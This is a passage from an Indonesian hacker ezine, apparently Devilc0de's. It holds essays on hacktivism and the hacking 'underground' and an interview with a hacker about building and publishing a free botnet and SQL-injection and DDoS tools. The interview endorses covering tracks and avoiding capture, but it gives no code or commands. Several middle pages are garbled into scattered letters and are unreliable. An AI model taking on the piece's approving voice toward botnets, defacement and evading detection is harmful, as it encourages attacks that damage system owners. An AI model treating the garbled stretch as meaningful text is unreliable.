yang dalam, lalu dia mencoba melakukan dimanfaatkan oleh pihak swasta untuk 'senjata'
penetrasi terhadap sistem tersebut. sedikit menjatuhkan saingan.
kesulitan teratasi layaknya sebuah tradisi atau
sebuah kewajiban jika seorang penyusup telah
Devilz Quotation
berhasil menguasai sistem target tentunya dia tak
ingin kehilangan akses tersebut. Kemudian Cyberpunk emerged in the mid 1980's and abolished the old
terlintas sedikitnya tentang 'imbalan' maka dia borders of the closed and hierarchic Internet society. It was only in
berusaha menghubungi pemilik sistem yang
the 1990's that Time magazine asserted that cyberpunk was the
pernah di susupinya dan mengirimkan tawaran
new counterculture of this era. It was completely different from
untuk memaintain dengan imbalan yang
the counterculture of the 1960's since it was based on technology,
dikiranya masih pantas namun, apa yang
the city and urban disorder and no longer on peace, nature and
didapatnya tak seperti yang di harapkan. Dengan
love. Cyberpunk activism was based on "hacktivism" and not on
dalih idealisme, dia melakukan defacement
political activism and civil disobedience. In fact, cyberpunk rebelled
terhadap halaman index official site. Walau
against multinational corporations, service economy and computer
sebenarnya di dasari rasa kesal, pesan tersebut
establishment to free information which sounded like "a ticking
berkonotasi sebuah aksi protes terhadap
time bomb" into an “increasing trying to establish a monopoly
kebijakan perusahaan pembuat piranti lunak
standard of intellectual property". This is a very dangerous attitude
ternyata hal tersebut menyebar hingga ke saingan
in the sense that, in a computerized world, the people who master
pemilik perusahaan [2] hacktivist tersebut
computers have a huge power. This hacktivism stems from a new
berubah menjadi seorang mercenaries (dalam hal
conception of direct action. For instance, by crashing phones and
ini saya menyebutnya hacktortionist) untuk
computers, cyberpunks want to show that a shutdown of our
menghancurkan saingan-saingan lainnya. tanpa
computers is needed and to make us realize that the society we
sadar,dia melakukan perusakan yang cukup fatal
live in is unsuited for us. But, to some extent, the cyberpunk
(menutup semua port,denial of service dsb)
movement failed as a counterculture since it never combined
sehingga untuk biaya repairnya malah melebihi
"ethos and goals": cyberpunks always work by themselves, they do
apa yang dimintanya tentu sang pemilik sistem
not have any social organization and so they hack here and there.
menderita kerugian materiil yang cukup besar.
Moreover, when they have a political opinion, cyberpunks are
Aksi protes tak hanya berhenti pada 1 titik,secara "libertarian". Some of them use encryption keys to protect
implisit hacktivism tak hanya focus terhadap themselves from the State so as to ultimately destroy it. In the
hacking bermuatan politik. Sebagai contoh case of cyberpolitics, it is only one of "parasitism" based on the
semakin banyak tontonan di televisi yang sangat detritus society casts away. But we still do not know if hacking or
membodohi penontonnya dengan adegan yang copying is a crime or an attempt to set information and people
menyajikan beragam latar belakang kemewahan, free. Anyway, the cyberpunk movement was criticized by punks as
pornografi, bahkan film kolosal yang melenceng they regarded it to be an over-demonstrative and poor movement,
dari historikal. Bukan hal berlebihan jika seorang reliant only upon technology. Nevertheless, cyberpunks followed
cyberpunk menyampaikan rasa keberatannya the same trend as their predecessors did: they were integrated
dengan cara merubah tampilan utama website into the capitalist society by means of computer security firms
stasiun televisi ataupun production house lalu such as described by Marcuse. However, it is also notable that
menunjukkan bagaimana acara2 tersebut they were more dangerous than hippies in the sense that they
membodohi masyarakat yang umumnya hidup could be capable of changing society if they organized themselves
dibawah garis kemiskinan dengan latar under a unified ethos.

http://ciberpolitica.net

Devilc0de INDONESIA “To Unite and Develop” 20


“Independence C0DES, DC Backs to Holy”

Meneruskan Kemerdekaan Dunia


Underground bersama orang-orang yang hanya dikenalnya
melalui layar monitor. Lagi-lagi urusan "perut"
yang berkuasa..... :(
Oleh: t3k0
Kita memang tidak bisa menyalahkan orang-
orang ini, dunia kerja juga membutuhkan
kontribusi "Profesional" dari mereka. Begitupun
Bingung, panas dingin, batuk-batuk, meriang, sebaliknya, mereka membutuhkan dunia kerja
sesak napas. itu mungkin gambaran perasaan demi keberlangsungan hidupnya. it's all
saya ketika pertama kali mendapat PM dari uni disappointing fact....
Nofia yang menanyakan kejelasan sikap saya
untuk berkontribusi di Ezine DC #3. Saya tidak Terlepas dari semua itu, seharusnya orang-orang
pernah menyangka akan direspon positif oleh ini tetap berkontribusi pada dunia yang mungkin
kaka kita yang satu ini. Tapi perasaan bingung telah membantunya menghadapi dunia
tetap menggelayut di pikiran saya. Bingung mau "profesional"-nya itu. Mereka dulunya juga sama-
bikin artikel tentang apa. Sementara otak lagi gak sama merangkak dari dasar. Mereka dulunya
bisa diajak kreatif, ya sudahlah.... saya sampaikan "New Fresh Blood" bagi dunia underground.
curhatan saya saja (hope you like it :p. *Anyway, Mereka menjadi diri mereka seperti sekarang
dapat PM dari uni Nofia berasa dapet kiriman karena dunia ini. Kontribusinya terhadap dunia
paket dari Turki.... :p underground juga harusnya tetap terjaga
walaupun tak se-intens ketika mereka masih
Hell yeah, kita cukupkan basa basinya sampai menjadi "New Fresh Blood".
disini saja, karena masih banyak bahasan basi
yang akan saya sampaikan, demi menjaga mood Karena tongkat estafet mesti diberikan, tapi apa
kalian :D jadinya kalo tongkatnya dibawa lari sendiri dan
hilang entah kemana, tentu kita tidak bisa lagi
Dunia underground, dunia penuh kebebasan terus "berlari".
dimana semua informasi mengalir dengan deras
tanpa batas dan tentu saja tanpa konsekuensi Tapi bukan hanya aktivis lama yang harus tetap
biaya yang membuat banyak orang tua lebih suka berkontribusi, aktivis baru pun harus mulai
anaknya membantunya mencari penghasilan berkontribusi secara nyata dengan melakukan
daripada belajar di sekolah. Informasi atau bisa riset dan sharing hasilnya demi kemajuan
dikatakan "ilmu gratis" itu merupakan sebuah bersama. Para "New Fresh Blood" ini harus mulai
kontribusi besar dari orang-orang yang mandiri dan harus banyak belajar sehingga ketika
merelakan waktunya yang berharga untuk "tongkat estafet" diberikan, dapat dibawa dan
melakukan riset dan membagikannya kepada diteruskan pada generasi baru selanjutnya. Siklus
orang lain secara free . Mereka rela meluangkan ini harus terus berkelanjutan dan tak boleh
waktu dengan teman-teman "nyata"-nya demi terhenti, demi kemajuan dunia IT dan demi
teman-teman "maya"-nya (greetz to this people). orang-orang yang punya hak belajar tapi tidak
mendapatkan haknya karena konsekuensi biaya
Dunia underground pula lah kemudian yang yang harus ditanggungnya. Saya selalu
menghasilkan orang-orang yang benar-benar beranggapan bahwa ilmu itu gratis, hanya
"pakar" di bidang IT (no offense :p ). sekolahnya yang mahal :p
Umumnya, orang-orang di dunia underground Dunia underground adalah dunia yang bebas,
ini dipenuhi oleh para pelajar. Mereka yang dunia yang "merdeka". kini saatnya bagi kita
masih muda dan bersemangat ini beramai-ramai sebagai generasi muda, sang "new fresh blood"
mendaftarkan diri ke forum-forum underground untuk meneruskan kemerdekaan itu. Tetap
entah demi mendapatkan ilmu "gratis" atau demi berkarya dan berbagi dengan orang lain adalah
mendapatkan pengakuan dari orang lain bahwa jalannya. Apalagi yang kita tunggu, mari bangun
dirinya seorang "Hacker". Terlepas dari orientasi bersama dunia bebas yang mencerdaskan ini.....
mereka memasuki dunia ini, mereka juga lah :D
yang nantinya akan menjadi kontributor ilmu
"gratis" selanjutnya atau istilah kerennya "new "Kemerdekaan bukan sebuah pemberian,
fresh blood" bagi dunia underground. Karena kemerdekaan adalah sebuah
mau tidak mau, disadari atau tidak, orang-orang perjuangan".
yang selama ini menjadi tonggak utama dunia
underground pasti akan berpaling ke dunianya
yang sebenarnya, "The Real World". Baik secara Dari kaki gunung ciremai yang teduh,
frontal alias banting setir dari dunia IT maupun
berubah menjadi IT profesional yang "money T3k0
oriented".
Kita menyadari bahwa orang-orang yang bergelut
di dunia underground juga memiliki
kehidupannya sendiri yang tak bisa dilepaskan. Greetz:
kehidupan nyatanya pasti suatu saat akan
menuntut waktunya lebih banyak (saya To mywisdom (terima kasih atas tulisan di
merasakannya sendiri :p). blognya, inspiratif banget), chaer_newbie
(terima kasih kerja kerasnya), om wenkhairu
Hal semacam inilah yang kemudian membuat (you are my hero), om ketek (maaf udah bongkar
orang-orang yang bergelut di dunia underground b374k polymorphicnya :p) dan Uni Nofia
sedikit demi sedikit meninggalkan dunia yang (makasih atas respon positifnya), semua rekan-
selama ini menemaninya belajar. Dunia kerja rekan DC yg selalu menemani waktu belajar saya
pasti akan memaksa orang-orang ini melepaskan :D.
kebanggaannya melakukan sharing dan belajar

Devilc0de INDONESIA “To Unite and Develop” 21


t a
r & i
a X a d i
s
a . I t c s , n a k t a a a
s - I a a d

22
g k t
e a a t t e e b g a j
a e e p a d
n a :
h y y X a i a n
r s e g m s n n a n i
a y o n
r a n I
I u d u e a b u t o r r h A n
i
y n t e i
b n a b a b t y n
i p g a
i a k e
t e i
s ,
- a n t a n m j
n n n g h o
r a s s r
e n b a h h
k r b o n n l
u e e e m I t n e d k e u t I e a
k a
a
y e t C I a b r e r
e a a a S e n p g , b m h N
n k a . s g a m m m k u k y . a k o r a
j i a
a r e n a

Devilc0de INDONESIA “To Unite and Develop”


a c g a t n e k g a c b r ,
i a s
i i d e
t a a d y n ?
b a n k i
l e p n n i g a m e s j b d n y s a
j n r s
h a e i
s d i a s n h e m k a
s i a I g a n n e i
t
t
a a s r a , a
j a
l y e a
y m e d j
n i
d n P k e i
a p a
g r a e f a a , n a
r ,
t n a a e a S i
r m l , r
n a t
i m i
t t
i
k s a e o h a h u o p j a y I e h a G
a p k i a a r
a g d a p a b k a a m y e k h y t
s h r m e u t
i t n n
I k d i
r r
e i
s y n g a m a o
t n o
a n a n b
i k n a a ,
p u t n X
I a n y A c n l
a p
i
n r u d k
i o r i a h i
d p u s k n h r
i I h a n i e o s s
i p p t n h 0 r n c t a Y a i e h .
l , h a d p C i t
) r
i i
k u
a
a
a
e p 5 a
d a x e i
s 6
9
y
n n
a
l
o k
a o a
n c b n r
e . m o
H
a
i
A t
a l
a f
n
m d
n p h a
t
E
t
n
r n ?
a 9
1
a
b g n
a l
a
n
i
t e
r
x
E n
a
a
k
t
a
h
o
;
i
g s
s h k w a a a R a a e e
t a y n
i k k a a t i h k t a a
e a r , m s
i h n l
a y n n D n n a r a o k k e k
i a e n l t
i
n e l b k n r I i
l u p a l n o l
n a b a n i
r a
r e e i
s
.
h a h n j n
u t e
d ,
a r m B r
e c k
a
i
s
o T g n
e a h
a
a
d a
t
a
j k
i
t
n k a k a a
T
n
a g e
n n i
n e
t e
d
.
a m u y a
f
d
n
i
d n
a k k
t d , i
k a
s d I
a e
n
r
u a
m
t
k . k
t
i
d r
e
e u n
I e y
n e
t
a n
a i
t
a u d e a m d s s a
e
d I T
I
b
m
a
t
i p
a
s e
t s a
k
j
a
i
s
e
o
k
m
t a
t
a
j
e
a
y a
u S
I
t
n
i i h
a
d n m g
n u b
t m
0 T a e k d a i a i
r s n a r s a b T a u a a a
l a . r a k
c I i k k t
i m y e i a g e , d m A a p r g a h h a g i
z r n r a n k i
l n b o y n p a a R y m u
l a n d c a b n n
l
i a u e d e i n a m i d a
i a u t
i w e a
i a e s
i e i x u i a e
v D b i m n U h A n n b s t k s m G b s s b d d E b n s m
e k t i I I i I
D a
A P
R
A (
C I
M
,
u u
a
t
i
N r
a g n k a g T
A H r b g e , s n I
W e n p a T a a
y . a n
A E v
u
i
d g
n e , i i
d g O t
a I r
e k
i i
n a
r
W
F k
a n a T a d
i
- a
j
m k
n
a n
a
n
a .
t y
n
g
n m h
a
r
a u e
U d a n
a
I y
i e
d
a
s
a
p n
a
k
n y k u
b r
e
a
t
i a h l
u n
e
d p
S i m g r u d t n h
“Independence C0DES, DC Backs to Holy”

t r m n g a I u a b a i
s e t k i a i m a a
n e i a n h . t r m m s , a b d , n k
Y a
k b a ? d a h
u
r n e
b h
a a
u
l
o e r
e a
y w i
D
u
s
n
a u
l
a
d u n
R a
t
s
u
g
a i
n
i
b y
i a
l
a
b
e
t e
b u
b
g
n s n
e t
g . n
a
h
a . g D a
l n g
n a
R a r
e
B i
l i
d
r
a a
d n ,
n , e e n
a m n
a
s u b a
p n
a .
s
e
s
a
k a k
i
f
A k
i t .
a a g h a a a a s m k a a a m i
l a Y a a b i
n
d h g D y d i a - a k m
H a
n
a
y
n g n
u
a
d i
r n . n
l
h
e u
t
p
a
y
a i
b
b
r
e
s b a .
r
w
e
i
s t e
g
i
s ?
s k g n p a a a n a l
o n . i
s s i a m p a t e u p a
i n n a h t a s a a r d u u a j h n r
u s a y
b i a t
n m h n k i a b k e a
j l h e
k u a
l a o n a p n
a a
l d i
c a p a
t i
s M t e p a u e a h e d e t a
i e i e
t e n a
i a n
i m r g r
a s t n a b d n a r m
s m b k r t a t .
u m e e g n b i h a t m u
s I m e a
e b a r e e d n r i m m n e r
p a k T b b l
a
n , u d e p S a e a d l a s i
g r d t
a m e a I g a e d
o n s n b k . u m b k a d k o u u g u p y a n w s
d a a a a n l a u
t n e l S s l
e i n i a
y a n i
d
n
I n a
l k y d a a
l e
l n y n r s a o a n b d l
u n j
g a
g a a n i
t k e p a a
s u e a d
i n a t i
d a
j t u h d a
T a g k u n S m w t
n y t k l
u i
k a n e d a n d
I t
s e t r a a i a , a i a , e p n y e b t k u r
i u
a s a e i
s s .
k i k u
l i
s n s a
y t r
i a n m e a a g A M
i
n g p s e o i
r d - a e a n h e k
i i
d l
u s u p g
u n m a h n b a k n l n g a a a c p u t u , b a n h m
a a d a o m n u a g o n k
i s u r e l
a s m i a
t a
D d l n l d e e t w n d i t a b u a m b l a e S r n u
. e a e i
n n n a a n r
a e i e o t
i e e e u . e a a
1 s d p I I m m u k y I j K b s S K k s s p m 2 b T K
s a
t n k a n i
u
t i
k a . u r a .
t b
i g d n t a k i
l o
l
s n n n t i

23
t n a d r
u a a u e . n ,
l l
a u , a
n a t n g k r
t t a a n s n d
e w n u m k a a
i a a a n e i
s t a a
a e o a u b g m s n k n o u a - n u
m k t r j t m a u i
b a g a i
s m m a a n l
e i a g a
t n n e h c h n
i g s b
i n a y m a a
c t
i d r
e n e u l a a a n n e a r
t a n e d l
e
a k u n i m a 2 b n y d e u f k
i n d a a t a s
f a d c a t

Devilc0de INDONESIA “To Unite and Develop”


e y t
a a n e i d n m k n u m b o
r e o t y u r
e b ,
D n k u p a u a u a m u P k k
r a n m b & i
p
e u
s a m m r e h - n h e k n a
. K g m a e m B , h i
k t a T b g a e g i
s
e m i n u r m p t . u a a a r I n a s n u T
u
r d n i
k r i r a i
g a d h a a i n n i
l t .
t u
r a
j a c o n u a a t u m i
l P i s a a a i
t a
t t n g a f i a u m b a e e , n e g s k s s y
u s e n h - t k l
i a i , M s m r u s n k u , n n
a


b u
j m a m n d g d n . s o
i D a a a
l k l
a i
i n
i
d d s u a
s a , n k a
i a u a n C y e a a a
a g a n a
t r h a a u r
i y r d e m p l m g l
-
n s a i o
f g i
l k y t d a e n s a a , e r
o a n
S a i
b p n n i
p e ? n n k t a l
a k t
a n m f b i
. d h u n a r l u u e g n k h d u k u i r a
l
u e a


n a n a m y i
d t
a g s n a a o i t ? a s e n
u k a k o p a m m u n a k k k s n a h m b u b a
p u h . a k u n
i j r s a n y a a o
t i u s a a o t
i e
a t
i a n p a
t a n n o e a
k i n , m a g u N c t
s k d
p d a a m a l e a
r f s m i h n a a e y n b . h n ,
a h u g u y m a n e y e
l i d d n a e a a i i
s h
a
t m n i
t r a g j a h m n o k m u a a b S n d t a a
t
h n - a r
e o i
s o n a
l k a u s i
a i
a k u . a u a k n
a i
r .
i h b p f
- e l
o i
k e i
d l
a u b e b g m a a i
g h s u o i
r
l
a e r
i a m e m n n a b i d t
i m s . a m d r r i b v e
s d d i
t o h d a u e k g n
i m a
t e a e e m m d
a m n u r S u
r d c m m n s a n m B u r s p n d e a m
e e M e . o n e e e e i
n m i i a . a e e e i e a e
m p s p 4 f I t s p p I l
I d d y A 5 k s k k S s K m & p
n g a i a
a i a
l n j g s k
r n u a n r n u a i
t h
a a i .
t b y a h e
k , a
y h b
i p e ? s u
p y a u h k a
t e a
y a u r
t k t u n
& k . n u b a a g n b n h y a n a
i n n t
i e a
u a n m e i p t n i a n j o s a e s p p
o t i a s g a i
s n r g g t - n g k k s m t , n
b n s i
d g e r o r k i
r a
l e n n n
i a n a i e a i a
r u e n S e l e a e i m s a r g s a n b p t
“Independence C0DES, DC Backs to Holy”

u n a
j a . t o b - h e a
y l
u e n a y a b a c u a
P g o n b a a g n e i m g p u
t t m i t i g e
t h a
f b t s
n d e i t n k b s
k e n i
s n n a j n - e m ( o
l
o a n m m n i
k a e t P e k i g e n a a e a s
i d e o
n u I e u d t a a m i
l
i p m n
i p u
r r g d b b m h l
n j
r i a k d r
e n a g n s m a d t s a n o a a . a
i t
O e d i r i k a t
n n a u
t ? i
a i
t a n u & p a n c h n i h p u
b i
f s e d c i i g i
s a p n e s a t g a e d a u b
k i e P t a m c g n - y a s y b i
s p h n k n i
k k a
t l r e
a h W n . a h e e n e s n m k k s m - u e
l e g a a g e
t a s
r
P a
l o a s m p e d u l
a a h i
l g e s p o d n D n n
i t e
s e i
s d i
n e a i m t
i s a a n u
t a i i
d . m a m g u t
a t n n u p r a s n s s
i n B b a m i
s t a ,
a n a i y n j
r g e I d g a d a a
i a p m r n e g j a y c d a n )
e n u i
d p n r
e s k a a . i
d o a r t r a n a h a y a e
k a k h n
i a a n e i
a d t g n
i e i a a a s b
i i
s c a s t s l
o
y e t
e u l
a j k n a n a ,
a s r
i g s h u d u & t y a u h
a
j r n r p r
e a e o m a k a
j l n d a i
b i
d t r t n
i s b t
a
r ,
s f r u
l k k g d a h g g e a n s n a i
t r r a a r y
e s n e e g n n r
i r
e n
i u
t n r d e a t k e d s a
j e t
i j t
i
k e a t s n t a a I d t n i a a a s r u a t n n a m k e a r
l
i l k n a a
k n n i t e t r K , e b d , a i h e p g u
s e s I n y r a u d n n n o h n k e i
t n t a p n a r c
a r
i a ,
g a e m g r a e m e . a a
i s
r a s d a a r a e
h w b m k b i e g m n m k
i n t t a e n d a n s w a h s
e n u u a n t n i l
i u n
i a h t u , h p e u a t n n
h r
e b a
r g s h g a u a e k e
c m p
i r m a l p i
r a e k t
i k n a a
a k a a a a
l t
u a b p k c a a l
a e - s a u i
d w k g s , e g g
l
a c m k k m a l B m m a a
f m f a k m i
t u
r h a
l n a s n a p m n n
d a e e e r d a . e o l
e e e e t
a e e a e a a e b b a d u e e e
a h m S k e
t a S 3 p c b d s D d s p m b m w s i
d y y a Y S d d
g h
n h a u
t / / -
a a n k , e a 0 9 n

24
y l a a r t s j 9 2 a
r a g e a u h /
r 0 6 k
e m d n m w g b a e 1 1 s
k u a e , . o n a l
e k -
9 -
7
u
r
c l
e a d e r
e P i
d t c 0 0 u
l
a b k g t g ,
i
a
h - - e
H e e a
y d w a u n p - 1 4 m
s r e
l o e l
r e a i
d
0
- 0
- / :
i
. n

Devilc0de INDONESIA “To Unite and Develop”


n e i w P r e m t a 6 8 7 d
a n m g o i G p g - j
- 0 0 2
/ i
i a
k i a n k
i i n i
g a 0 0 2 m
d h s b K l
i h
t n
I a a
t
i 2
/ 2
/ 0 h
a
j e m m i . y l k
- s s /
8 e
-
i a s e i
k e W " r . k e e 0 f
d b b i
l " y
t r e r u v
i v
i 0 u
a g O m i m , i
l e k e : y
/ h h 2 /
r S
j o . m r i k
c c k r 9 c c /
t e
r l " N e e e
r b
i a a c e 0 r
a r
a e k y
r m
e b g A m k i s h a
r k / / / n c r o
k
c e o D . c a
t n H h C c 7
0 m m .
o a
h a c
a g l
b r
e r a l
o o . a a 0 o o n - H .
i
h n " e e H p r
e l i
d H 2 c c o g
g w k V s k n i / .
i .
i h n a m
h h h d o c a a e c a a
j d m m m a a
t d h
a a a
l e P a r
a t R a k n a o h h w n n e
l
a d i
t l
w . H p a t H u e j c e e a e a f
u
d u s g s
i a k a b m n .
s f
u f
u i
r t
- k s
a s i o n r a i
t e a , e n t h a .
u a n a e a w r r u a a m i
a
s
. s
. a a K y
a t
i y k r g p h e G m y y s y y s
i r
p i r
r
y n
l i
r o d a p n n a
t t r
r r
r m a g a
n n u a a e
l a b e s e r t
a i
k e a a o k n h
a a
l c c u w n s e s e j n
/ h
/ h
/ r
/ - u /
/
m u n n m o e s n m h w a i
r /
: /
: /
: /
: h j
n :
p
t u e n r
a a
l a o e o r a p p p p a
l u t
a
n e
b m m e
s K K e D C l
o P e
d M t
t
h
t
t
h
t
t
h
t
t
h a K t
h
j s
,
l
i i ,
t
i h
a c r n
i l _ i
n
u a R g e a l k e I
d l
r s .
a E n
i k y i
c e p e a .
a e r i i d K k k a e r a n h y a
p
i P a b m u C c a h l k p s a T a u y
r t
n n .
i a A a
n a , n o a k # " s k n
a . a i n
i k m H H g u a a k g r u c G a u
d a
y k n n a b g a a n & k i
h i
l g m
n a a a a m k a g e g n e a t N a l
“Independence C0DES, DC Backs to Holy”

a n m t
i u o k ? n n s n h A u l e I
R k n i
n m k d a s u a a i a m g e a e i
g
k


a a n a g k o t
n d e r n h s .
i a m _ A u m a
a
j k s a s n s u n s o a e u
r r
i g r r H
r a a k g i
t n n a g e k s e d n k e d g b
e j
r j
r a n n a a s k n s k - p n a a u k S
" i
l n m
k
i e e a e k k
i a
l a a u
j k e n p t
n c a a e
d g k T
I b p h s e k y n n c a s e n u a h k y m
n g a i
n j n a u a m a s a H a e g
u
l e n a t
a t
a r i
f g a a
i g n h a i a T a /
i l
a s n u
r m i k u g e
c e n
i g s n e n d i . r
a .
a k d n a a
e l
a a k n d l
a n u e a a d i
g s i
w a a r
p u s M r a n n p a n d m i
d n a a c a / k o m
g a i e s e e d a .
i u a a m n b a i g 1 u e k
n g .
a p m m g n g r g k a e r y b r # b s a
a m a d g t
n a m a m i
b n k n r e a r : o
. n e d
y & l a m n a a a p : b e a u a b s a s a i a s i
t
l k e a g d y
m h r t
r m y j
n N k n u c
i i o n ,
a a a g m y n n i
s a a
l e e e r u A - g a L h d p e n n
h s y n a a p l a b b g e n D r n k . t e , r a u
i
b n a & n s k
a i
r a d & n t
u e e a r t
u E p s a
k g
k a y n a k k d a h a p a k n a b r i
k c n m
a g b n a n s k a g m y c e j
a e i i
h , e a
y n e a
k y a a e u e n n m n a s g e
s k w t g d n
n a h
i n k n
a
d r
e t
i r r
e o a t h a r c . e n
i u -
a y b n u
j a
t a a t r p p e k y a i n e a n _ t r
o o d n u h e e n


b g e p a r p m
i p u
p e g e t b d t H / r e m e
h n l m e a a a k n a g i
d a
l N m k /
: e e k
i a a m e P r g n m c e y n m e m a c e p k p t
r c
b r d o . a a a o a a a a r e d A a
i a h t
t c i
n e a
e
l o a k m 6 h B d C H m S y g c p a D d h T h a I b h
“Independence C0DES, DC Backs to Holy”

Devilz PROFILE “Mengajak kita untuk sadar,


HACKER MUDA bahwa kelebihan adalah
kekurangan kita.”
INDONESIA

Redaksi: selamat malam,ah akhirnya kita ketemu juga


Call Sign: ya,setelah sekian lama.hehehe.....baik,saya akan
mengajukan sedikit pertanyaan.
the d4r3d3v1l of networking / mywisdom / 3vilution
d4r3d3v1l : kalau dikit bukan wawancara dong :P
Home:
Redaksi : (bener juga nih....) EHEM.... seperti yang
BSD tangerang
sudah di ketahui bahwa anda sedang merencanakan
Education: pembuatan dan pengembangan botnet kira-kira bisa di
ceritakan awal mulanya?ataukah memang cita-cita
Oensoed Jateng. Jurusan Ekonomi – Akuntansi anda dari dulu untuk menciptakan karya yang bisa di
bilang fenomenal itu?
Born:
d4r3d3v1l : ngeliat th 2007 ada fenomena serangan ke
Tangerang 5 November 1983 beberapa root name server. dari situ gw mulai
kepikiran bikin sesuatu yg bisa buat niru kekuatan
Hobby:
serangan kayak gitu. pertamanya rencananya gw bkn
Music, Wushu, Economy worm,tapi di tengah jalan gw dapet rencana laen yaitu
botnet. soalnya klo worm cuma gw sendiri nanti yg
nyebarin,tapi klo gw jadiin botnet, gw bisa buat 1 web
khusus ntar buat publish tu botnet,tujuanya gw ngasih
Pernah mencoba darkmysqli? hacking tools yang 2 botnet yang bisa dipake umum berkualitas dan gratis
specialist menyerang ke bug sqli tersebut di ciptakan sama kayak pikiran orang yg bikin metasploit.com
oleh sekelompok team hacker bernama darkc0de mungkin, dia ngasih sesuatu yg bagus gratis bertahun-
kalau di indonesia darkjumper user enumeration tools tahun
sudah cukup mendunia bahkan di gunakan kelompok
astalavista yang memang komunitas tersebut bisa Redaksi : jadi awalnya terinspirasi gitu ya?apakah
dikategorikan old-team darkjumper juga dapat beraksi terselip pesan 'khusus' di karya anda yang satu itu?
untuk sql injector rasanya tak asing pula dengan tools
lainnya seperti silviasql dimana lebih fullperform ke d4r3d3v1l : pesan apa yah,kagak ada ;))
asp based,angel-kill,remote ddos exploit,fork and
Redaksi : untuk darkjumper dan sebagainya menurut
enable juga masih banyak lagi,langsung saja,kali ini
anda sang creator kekurangannya apa?walaupun saya
redaksi menemui hacker cool pencipta tools buatan
sering menemui di forum/komunitas open source
indonesia di atas,berpembawaan kalem namun gesit
mancanegara.
dan cekatan dalam mengerjakan sesuatu.
d4r3d3v1l : itu bukan project serius bro,lagian dah
Terlebih 2 tahun belakangan sedang mengerjakan big
jelek sekarang
project botnet nya.
Redaksi : oh ya,bisa memberi sedikit gambaran
Kata mutiara yang pernah redaksi dapatkan di
nggak?perbedaan awal anda menjajaki dunia
signaturenya.
underground IT dengan pendatang baru masa kini?
“Ilmu pengetahuan luas, tanpa batas d4r3d3v1l : jaman dulu menurut ane hebat2 sekarang
seluas samudra, disaat dirimu merasa juga hebat,cuma klo dulu mereka lebih invisible
pintar saat itulah dirimu menjadi bodoh..” maksudnya ga meninggalkan banyak jejak. prinsip
dulu sih :
kalimat yang sangat menyentuh,membuat saya
meneteskan air mata juga air lain di tempat lain. o ALWAYS cover your tracks

Devilc0de INDONESIA “To Unite and Develop” 25


“Independence C0DES, DC Backs to Holy”

o Don't get caught terhadap materi defacement site ataupun dump db


(carding) walaupun kebanyakan orang
o Don't get malicious mengartikannya demikian.

o Get off as soon as possible d4r3dd3v1l: gini aja ane kasih contoh figur2 buat visi
ke arah sana jadi mencontoh tu yg baik, bukan
o Keep a bottle of "Wild Turkey" near the terminal
mencontoh orang-orang yang ngedeface dan ane juga
(RED : *CONTOH TUH)
sendiri ada salah juga (ngebikin botnet ini salah) coba
dan juga dont attack gov klo sekarang banyakan orang seperti Linus Torvalds,Timothy Berners-Lee (pencipta
pikir deface itu hebat. klo dulu orang2 hebat bisa www dinobatkan sebagai orang yang inspirasional) ini
nyusup tapi ga ketauan klo ane sendiri bukan intruder contoh hacker yang sebenernya mereka berprinsip
yg hebat bro. open source begini coba kita pikir kalau nggak ada
orang yang menemukan www. sekarang kita masih
Redaksi : sekarang banyak ya forum/komunitas pake yg namanya BBS dan gopher,sayangnya gopher
terlebih mereka mengajarkan deface cyberwar ga bisa berkembang seperti http tapi emang begitulah
ironisnya banyak juga defacer yang bawa-bawa http sendiri punya banyak kelebihan dibanding gopher
agama,walaupun mereka mengatasnamakan aktivis karenanya dia nggak support image apalagi animasi
cyber tapi tidak ada sisi hacktivisnya. gimana menurut mana ada sih orang-orang deface website karena ga
pandangan anda dan punya cara khusus nggak untuk akan pernah ada namanya website
meng-counter pendapat bahwa hacker=perusak.
karena di situ tadi tercantum defacer (hacked by bla- Redaksi : right :)
bla-bla dan sejenisnya)
Redaksi : menurut d4r3d3v1l mungkin nggak sih kita
d4r3d3v1l : mengcounter juga udah susah ya coba kita orang indonesia bisa menciptakan demikian,padahal
kasih contoh aja develop macem-macem. kl mao niru jaman sekarang pendidikan ampun-ampunan ya :(
sukur klo ga mao ya terserah sebenernya bebas mao orang yang kompeten jadi putus asa karena mau
ngapain aja kan kita prinsipnya freedom ngelanjutin ke jenjang lebih tinggi jadi
kehambat,semisal seperti ada yang berhasil bikin CMS
Redaksi : beralih ke pertanyaan yang 'umum' tapi khas indonesia,antivirus,bahkan httpd dari php
please jawab dengan versi d4r3d3v1l sendiri. apa sih
hacker tuh aslinya? trus kenapa mereka suka banget d4r3dd3v1l: kenapa enggak orang sini bisa cuma
kata-kata 'hacked by bla-bla di tampilan utama site' ? mereka males doang

d4r3d3v1l : hacker dulunya dari orang-orang yg punya Redaksi : selain itu penggunanya juga jarang om ;))
kemampuan pemrograman di atas programmer umum
d4r3d3v1l : minimal kalau pengen bisa develop sistem
mereka bisa bikin yg lebih baik dari programmer
harus bisa nemuin kelemahan sistem kompleks yang
umumnya klo dari kaca mata ane. hacker tuh adalah
berguna buat developer suatu sistem yang kompleks
pahlawan mereka yang bikin revolusi di dunia
sayangnya sekarang juga banyak hacker ngaku
komputer internet bisa sampai kayak gini,kita bisa
hacking nggak pake tool padahal mereka nggak ngerti
make os bagus seperti linux,bisa ada protokol http,nah
dengan mereka pake browser aja itu juga tool yang
klo dari kaca mata ane yg laenya. hacker tuh aslinya
dibikin programmer.
hebat bisa nemuin kelemahan dari suatu sistem /
program yang kompleks. maksud ane bukan cuma Redaksi :menurut om,bahasa pemrograman untuk
sekedar skrip-skrip php tapi yg perlu kemampuan hacking yang pas itu apa sih,terus materinya apa?
reverse engineering missal daemon, browser, kernel,
dll d4r3d3v1l : C aja open source sampe sekarang
banyakan make C (under nix) untuk hacking sangat di
Redaksi : di indonesia jarang banget kan ya phreaker sayangkan pikiran mereka cuma 1 gimana caranya
nya,untuk orang yang bercita-cita menjadi ngedeface nggak tertarik covering track
hacker,penting nggak sih belajar phreaking?
Redaksi: covering track, forensic, phreaking tuh
d4r3dd3v1l : itu terserah freedom / kebebasan penting banget ya padahal
Redaksi : pesan,kalau bisa beri pesan terhadap d4r3d3v1l : klo phreaking ga tau yah ;))
seorang newbie yang ingin sekali belajar
hacking,setidaknya supaya tidak terpaku / tersesat

Devilc0de INDONESIA “To Unite and Develop” 26


“Independence C0DES, DC Backs to Holy”

Redaksi : kira-kira gimana sih kok bisa tertarik yg 1 subnet cuma gagal juga,soalnya jarang hacking
mempelajari hacking,cerita dikit dong apa memang win server cara bikin asp shell juga udah lupa
dulu background pendidikannya ke sistem informasi
and sejenis? Redaksi : lebih gampang mana jadi cracker atau
